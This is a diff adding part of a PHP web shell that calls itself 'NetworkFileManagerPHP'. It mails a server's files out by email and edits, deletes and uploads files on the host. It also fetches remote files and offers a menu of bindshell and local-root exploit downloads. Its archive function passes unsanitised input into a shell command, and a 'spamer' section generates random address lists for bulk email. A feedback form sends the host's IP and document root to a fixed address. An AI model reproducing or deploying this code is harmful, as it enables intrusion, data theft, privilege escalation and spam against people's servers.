+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $public_sites, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_sites$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "ïóñòî";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  Ñãåíåðåííî âñåãî <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
